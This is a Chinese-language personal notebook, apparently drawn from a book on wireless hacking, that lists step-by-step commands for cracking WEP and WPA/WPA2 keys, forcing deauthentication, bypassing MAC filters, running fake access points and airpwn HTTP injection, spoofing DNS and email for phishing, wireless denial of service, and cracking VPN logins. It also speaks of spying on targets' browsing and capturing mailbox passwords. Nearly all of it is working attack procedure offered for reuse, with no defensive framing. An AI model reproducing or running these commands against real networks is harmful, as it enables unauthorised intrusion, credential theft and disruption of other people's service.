》

虽然无线破解早就烂大街了，还是去图书馆把这本书补上了，做个笔记，以供以后参考，记得很全面但很乱。测试环境为Kali linux 或backtrack

wep破解

1.将网卡激活成monitor模式

    airmon-ng start wlan0 6      2.开始抓取无线数据包：     airodump-ng -w ciw.cap --channel 6 mon0      3.为了加快IV（初始化向量）的获取，可以进行ArpRequest注入式攻击，可以有效提高抓包数量及破解速度:     aireplay-ng -3 -b AP's MAC -h Client's MAC -x 1024 wlan0         参数解释：     * -3，指的是采取ArpRequest注入攻击方式；     * -b，后面跟上要入侵的AP的MAC地址；     * -h，建议使用，效果会更好，后面跟的是监测到的客户端MAC地址；     * -x num，指的是定义每秒发送数据包数量，这个num值可以根据实际情况调小一些，但一般来说最高1024就可以 4.开启aircrack-ng来进行同步破解：     aircrack-ng -x -f 2 ciw.cap     参数解释：     * -x，是暴力破解模式；     * -f，指启用密码复杂度为2；           1.启动无线网卡的监听模式 $ sudo airmon-ng start wlan0

2.  查看有哪些采用wep加密的路由器，记录目标ap的mac $ sudo airodump-ng mon0

3. 另开一个终端,运行 $ sudo airodump-ng -c 6 --bssid AP’s MAC -w wep mon0 其中6是AP的信道（channel），AP’sMAC是路由器的MAC地址，wep的是抓下来的数据包保存的文件名

4. 再另开一个终端，与AP建立虚拟连接 $ sudo aireplay-ng -1 0 -a AP’s MAC -h My-MAC mon0

5. 建立虚拟连接成功后,运行下面命令，加速数据获取 $ sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My-MAC mon0 6. 收集5000个以上的DATA之后，开始进行解密 。另开一个终端，运行 $ sudo aircrack-ng wep*.cap 如果暂时没算出来的话，继续等，aircrack-ng 会在DATA每增加5000个之后自动再次运行，直到算出密码为止

7. 破解成功后，关闭监控模式 $ sudo airmon-ng stop mon0

自动攻击工具：wep spoonfeeder Deauth验证攻击，这个对于采用WPA验证的AP攻击都会用到，可以迫使AP重新与客户端进行握手验证，从而使得截获成为可能。命令如下 aireplay-ng  -0  10  -a   AP's MAC   mon0 或者 aireplay-ng  -0  10  -a   AP's MAC   -h  Client's MAC   mon0     -0指的是采取Deautenticate攻击方式，后面为发送次数，-a后面跟上要入侵的AP的MAC地址，-h建议还是使用，效果会更好，这个后面跟的是监测到的客户端MAC地址

wep破解的多米诺骨牌

1.无客户端chopchop攻击

     1.airodump-ng --ivs -c 6 -w file mon0     捕获数据      2.aireplay-ng -l  0  -e AP'ESSID -a AP'MAC -h CLIENT'MAC mon0         FakeAuth:与ap建立虚拟的验证连接，以便之后注入数据包         -h 用于攻击的网卡mac      3.aireplay-ng -4 -b AP'MAC -h CLIENT'MAC mon0         -4 chopchop攻击,生成密钥数据流文件  -h 攻击者自己的mac         生成明文后缀为cap和密钥数据流后缀xor文件      4.tcpdump  -s  0  -n  -e  -r  replay_dec.cap         -s 从每个报文截取snaplen字节的数据         -n 不进行ip地址到主机名的转换         -e 在输出行打印数据链路层头部信息         -r 从文件读取包      5.packetforge-ng -0 -a AP'MAC -h CLIENT'MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment xor file -w writetofile         -0  创建一个arp包         -k ip目标ip及端口         -l ip 来源ip及端口         -y file，从文件读取prga数据         -w file  将生成的数据报文写入cap文件     6.aireplay-ng  -2  -r  writetofile  mon0         为加快iv（初始化向量）获取，进行Interactive Attack及交互式攻击，将构造的数据包发送至目标ap     7.aircrack-ng   chop*ivs         破解密码2.无客户端Fragment攻击     1.捕获     2.FakeAuth，虚假验证，监听界面会出现伪造的客户端     3.aireplay-ng  -5  -b  AP'MAC  -h  CLIENT'MAC  mon0         -5  fragment攻击，生成可用密钥数据流文件         -h  攻击者自己的网卡mac     4.packetforge-ng 构造注入数据包     5.文件生成后，同时进行InteractiveAttack攻击，在airodump下可看到数据飞涨     6.aircrack3.无客户端ARP+Deauth攻击     1.airodump-ng  -w  file  --channel  6  mon0     2.aireplay-ng  -l  0  -e AP'ESSID -a  AP'MAC  -a  FakeMac mon0          fakeauth攻击     3.aireplay-ng  -l  6000   -o  1  -q  10  -e  AP'ESSID  -a  AP'MAC  -h  ATTK'MAC         保证伪造客户端在线         -l delay  延迟数量         -o  每次发送数据包数量         -q sec  发送keep-alives数据包时间间隔         -e 目标ssid         4.aireplay-ng  -3  -b  AP'MAC   -h  CLIENT'MAC  mon0         -3  同时进行arp注入攻击     5.aircrack-ng  -n  152  file         152为wep破解 共享密钥的wep破解 1.监听模式 2.抓包，若客户端没有活动，则deauth攻击，aireplay-ng  -0  1  -a  AP'MAC  mon0     可看到CIPHER栏出现ska标识，右上角出现keystream提示     生成三个文件a.mac.xor, a.cap,  a.txt.  xor文件为包含预共享密钥的文件 3.fakeauth攻击。     aireplay-ng  -1  0  -e AP'ESSID -y a.xor  -a  AP'MAC  -h FAKEMAC  mon0     -1 ,fakeauth模式     -h，客户端mac或伪造mac 4.可同时进行ArpRequest注入攻击，进行完fakeauth攻击后，此时aireplay监听界面截获的ARP request数据为0，可再次进行deauth攻击使其重连。 5.aircrack-ng  filename

关闭ssid广播的对策

1，抓包分析

2，暴力破解 3，deauth攻击     1.airodump探测，关闭ssid的ap只显示ssid的长度     2.deauth使其重连     3，监听界面出现ssid

突破mac地址过滤

1.获取合法客户端mac地址，airodump、omnipeek、kismet

2.更改mac地址伪造身份。win下用smac，linux下ifconfig wlan0  hw ether MAC    或  athmacchange.sh 3.重新装载网卡，连接ap

数据分析

1.查看ap品牌 2.查看对方访问网站，观察目标习惯，深入攻击 3.截获邮箱等账户密码

 

破解wpa

一、传统wpa-psk破解 1、2、3.激活网卡，设为monitor模式，捕获数据 4.aireplay-ng  -0 1 -a AP'MAC -c CLIENT'MAC wlan0? Deauth攻击获取wpa握手报文 5.aircrack-ng -w dic filename.cap 破解密码 Deauth数据包将以连接至无线路由器的合法无线客户端强制断开，客户端重连，便可以捕获握手包。  -0 之后跟上攻击次数，可根据情况5～10不等； 如果成功，在airodump-ng界面右上角可以看到“wpa handshake"的提示。 -w 后跟字典名。二、wpa pmk hash破解 内存-时间平衡。 彩虹表。wpa rainbow tables. wpa pmk hash tables.关于aircrack-ng   主要组件 aircrack-ng 自动检测数据包，恢复密码 airmon-ng 改变无线网卡模式 aiodump-ng 捕获802.11数据 aireplay-ng 创建特殊的数据报文及流量 airserv-ng 将无线网卡连接至某一特定端口 airolib-ng 进行wpa rainbow table攻击时使用，用于建立特定数据库文件 airdecap-ng 解开处于加密状态的数据包 airdriver-ng 显示支持的网卡 airdecloak-ng 过滤出指定的数据 packetforge-ng 为注入攻击制作特殊加密报文，主要用于无客户端破解攻击 wesside-ng 自动wep破解工具，加入fragmentation攻击 tkiptun-ng 针对wpa tkip加密且启用qos的网络 （A） airdecap-ng airdecap-ng -l -e AP'essid -p AP'password filename.cap -l 不移除802.11 header部分，防止加密后的文件不可读 对于wep包 airdecap-ng -w AP'password filename.cap -w 后跟wep十六进制密码 解密后可用wireshark分析 （B）ivstools 合并ivs文件： ivstools --merge 1.ivs 2.ivs 3.ivs out.ivs 转换cap问ivs ivstools --convert test.cap test.ivs (C)airdrive-ng airdrive-ng supported        查看支持芯片 airdrive-ng detail 序号        详细 airdrive-ng installed        已安装驱动 （D）airdecloak-ng airdecloak-ng --bssid AP'MAC --filters signal -i 无线报文filename.cap --filters 过滤选项，跟具体参数 完成后，会保存为后缀名为filtered的pcap文件。关于wesside-ng 自动破解wep的工具.找出当前连接该无线网络的其他客户端mac，进行身份欺骗，使用类似fragmentation攻击方式，拦截广播及转发数据包，发现prga数据包。注入arp数据报，调用aircrack-ng PTW破解密码。 1.ifconfig wlan0 up 2.airmon-ng start wlan0 3.airodump-ng mon0 4.wesside-ng -v AP'MAC -k 1 -i mon0     -k 重传次数，跟具体数值 捕获数据包保存在wep.cap的文件，可用aircrack-ng对该文件再次破解。关于tkiptun-ng. 破解wpa 可以解开tkip加密了的数据包，并不是算出密钥。 1.安装 2.激活无线网卡，设为监听模式 3.tkiptun-ng -a AP'MAC -h CLIENT'MAC mon0 或    tkiptun-ng -a AP'MAC -h CLIENT'MAC -m 80 -n 100 mon0     -m 最小包长度     -n  最大包长度wps破解wpa／wpa2的捷径 1.将网卡设为监听模式 2../wpscan.py -i mon0        扫描开启wps功能的无线设备 3../wpspy.py -i mon0 -e AP'SSID     监测wps状态，是否为已配置 4.打开无线网卡自带配置工具，pin码连接，使用星号查看器查看密码 csrf攻击

现在也可以用

关于GPU破解 CUDA     1.获取wpa-psk握手数据包，工具（airodump-ng，omnipeek，commview for wifi，airdefense） 2.打开ewsa，cpu、gpu、dictionary设置 3.import tcpdump file导入握手包，cap、pcap、dmp等 4.开始破解 5.未注册版本只显示两位密码，用winhex查看内存。“工具”--“打开ram内存”--找到ewsa的进程，--“find text“，输入破解的前两位密码，编码模式为”ascii／code“关于分布式破解 free rainbow tables项目、ZerOne团队分布破解项目

cowpatty破解wpa

1.分析抓获的wpa握手包数据

2.cowpatty  -f  passd.txt  -r  wpa.cap  -s  AP'ESSID  -v     -f,后跟字典     -r,抓包文件

table破解

1.genpmk  -f  wordlist1.txt  -d  tablename  -s  AP'ESSID

    -f 字典     -d 生成的table文件名 2.cowpatty  -d  tablename  -r  a.cap  -s  AP'ESSID 1.airolib-ng  test  init     test 要建立的数据库     init 建立数据库的命令 2.airolib-ng  test  import   cowpatty  tablename     导入预运算tables 3.airolib-ng  database  stats     查看数据库状态 4.aircrack-ng  -r  test  capturefile

 

无线欺骗攻击

伪造ap

1基于硬件的伪造ap。 刷新无线路由firmware，dd-wrt ,openwrt, AirSnarf 2.基于软件的伪造ap     fakeAP     fakeap.pl --interface 网卡名 --channel 频道 --essid AP'SSID --mac AP'MAC     --essid zunzhe008 --interface wlan0         如不必需，可省略mac     airbase-ng     基于上软件的自动化脚本mitmap.sh     ./mitmap.sh -m ap -i wlan0 -o eth0 -s AP'SSID     -m 跟四种模式之一     -o 跟有线网卡名，一定要先配置完毕，确保能连接外网     -s 伪造ap的ssid，一般和预伪造目标一致     会将捕获数据保存在当前目录.cap文件     airpwn     下载解压 tar zxvf airpwn     cd airpwn     tar zxvf lorcon-current.tgz     cd lorcon     configure&&make&&make install     cd ..   &&  configure  &&  make     (libpcre库）     缺少文件：cp /usr/local/lib/liborcon-1.0.0.so /usr/lib     破解网络之后进行欺骗     注入配置文件：在airpwn主目录下     conf目录下，编写名为zerone.html的文件     内容：                 begin zerone_html         match  ^(GET|POST)         ignore  ^GET [^ ?]+\.(jpg|jepg|gif|png|tif|tiff)         response content/zerone_html         只要出现GET或POST请求报文，就将其中网址替换成content目录下的zerone_html     content目录下编写zerone_html文件         HTTP/1.1 200 OK         Connection: close         Content-type: text/html         <html><head><title>hack you!!1</title></head>                 <body><img src='http://xxxxxxx' width='100%' height='100%'>                 </head><body onLoad="alert();">     攻击前注意airpwn支持的网卡     airpwn -c conf/zerone_html -i rausb0 -d rt73 -vvv -F -k WEP     -c 制定配置文件     -d 跟支持的无线网卡驱动名称     -F 假设设置为监听模式的网卡中没有FCS values？     -k wep的16进制密码     连接请求网址验证效果搜索发现伪造ap：     namp  -vv -sS 192.168.1.0/24  -p 80         -sS 采用SYN扫描，在有防火墙时常用     nmap -vv -sV  192.168.1.1 -p 80         -sV 具体版本识别，对端口服务信息探测时使用     收敛法向量法定位apMITM:     Monkey-jack无线跳板攻击     airserv-ng     1.在跳板机1上安装airserv-ng，将网卡设置为提供无线网卡远程访问的服务器     airserv-ng -d 网卡  -p 端口     其他计算机只要连接到这个端口就可以使用此网卡     2.配置端口重定向工具     fpipe -l port -r port IP     -l 监听本地某个端口     -r 转发至某个端口，可以是本机     其他跳板也是如此，一般各跳板端口不同，减少暴露      3，远程攻击     airodump-ng IP:port     常见错误：address already in use，由已开启airserv-ng网络网卡服务并用默认666端口所致，修改端口或停止相应airserv icmp协议隧道     loki http协议隧道     GNU HTTPTunnel, HTTP Tunnel伪造站点+dns欺骗 1.伪造站点 2.dns欺骗 3.查看效果，ping域名，显示内网ip伪造电子邮件+伪造站点 1.截获邮箱帐号 2.建立伪造站点 3.受害者收到伪造电子邮件，包含域名相似的伪造站点    

无线DOS攻击

关联及认证状态：

state1.未通过验证，未建立关联 state2.通过验证，未建立关联 state3.通过验证，建立关联 Access Point Overload , 无线接入点过载攻击 --只要客户端关联表达到饱和程度，接入点就会开始拒绝新的关联请求，这种状态为接入点过载。 Authentication Flood , 身份验证洪水攻击 --大量伪造的身份验证请求超过所能承受的能力时，ap将断开其他无线服务连接。 Authentication Failure , 身份验证失败攻击 --注入无效身份验证请求帧，使ap与客户端的连接中断 Deauthentication Flood , 取消身份验证洪水攻击、验证阻断洪水攻击 --伪造deauthentication帧，注入，踢出合法客户端      Association Flood ,  关联洪水攻击、关联淹没攻击 --对于开放身份验证。伪造关联，填充连接状态表。攻击工作在链路层 Disassociation Flood , 取消关联洪水攻击 --取消关联广播多用于配合中间人攻击，而这个常用于目标确定的p2p dos Duration Attack , 持续时间攻击 --发送占用巨大持续时间值的帧，使其他节点等待 Wireless Adapter Driver Buffer Overflow, 无线网卡驱动溢出攻击 1.网卡漏洞检测工具     WiFi DEnum 2.网络资源，WVE，AusCERT，Milw0rm.com 3.攻击实现工具     metasploit framework RF Jamming, 射频干扰攻击 --全频道阻塞、瞄准式阻塞

无线vpn破解

1.扫描vpn设备

    namp、zenmap 2.截获vpn交互数据包     中间人攻击，ettercap、cain 3.破解     asleap：用于pptp/leap密码恢复     genkeys：将普通字典装换成asleap可识别的dat和idx专用hash文件     genkeys  -r  dict  -f  simple.dat   -n  simple.idx         -r 事先准备的字典         -f 预制作的dat格式hash文件         -n 预制作的idx格式hash文件     asleap -r shark -f  simple.dat  -n simple.idx         -r 截获的vpn客户端登录数据包 1.IPSecScan扫描启用ipsec的设备     ipsecscan  ip 2.确认vpn设备     ike-scan  --sport=0  -M ip         --sport=<port> 设置udp源端口，默认500，随机端口为0.         -M 将结果逐行显示         --showbackoff  vpn指纹识别     ike-scan  --sport=0  --showbackoff  -M ip 探测vpn操作系统或设备版本 3.基于截获数据cain破解